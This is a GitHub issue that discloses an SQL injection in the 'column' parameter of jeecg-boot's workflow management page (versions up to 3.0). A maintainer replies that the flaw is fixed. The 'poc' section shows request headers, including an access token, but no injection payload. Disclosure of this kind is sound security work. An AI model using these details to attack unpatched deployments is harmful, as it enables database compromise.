Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is an SQL injection vulnerability that can operate the database with root privileges. #3331

Closed
Deep0 opened this issue Dec 29, 2021 · 3 comments

Comments

@Deep0
Copy link

Deep0 commented Dec 29, 2021

version: <=3.0
precondition: After logged in the website,click 流程管理 proxy burp,the parameter "column" can be made SQL injection.
Screenshot & code :

图片

poc:

Host: api.boot.jeecg.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Sign: 7AE7A7990565A3187D8CE30725C82718
X-Timestamp: 20211229152402
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDA3NjI2NTMsInVzZXJuYW1lIjoiamVlY2cifQ.SX0HjEOmrGFDZt-oNUUOlTNYn9ftCOmhQIOgED9HZRM
Tenant-Id: 2
Origin: http://boot.jeecg.com
Referer: http://boot.jeecg.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close
@zhangdaiscott
Copy link
Member

jl

@zhangdaiscott
Copy link
Member

已经处理,感谢

@Deep0

This comment has been minimized.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants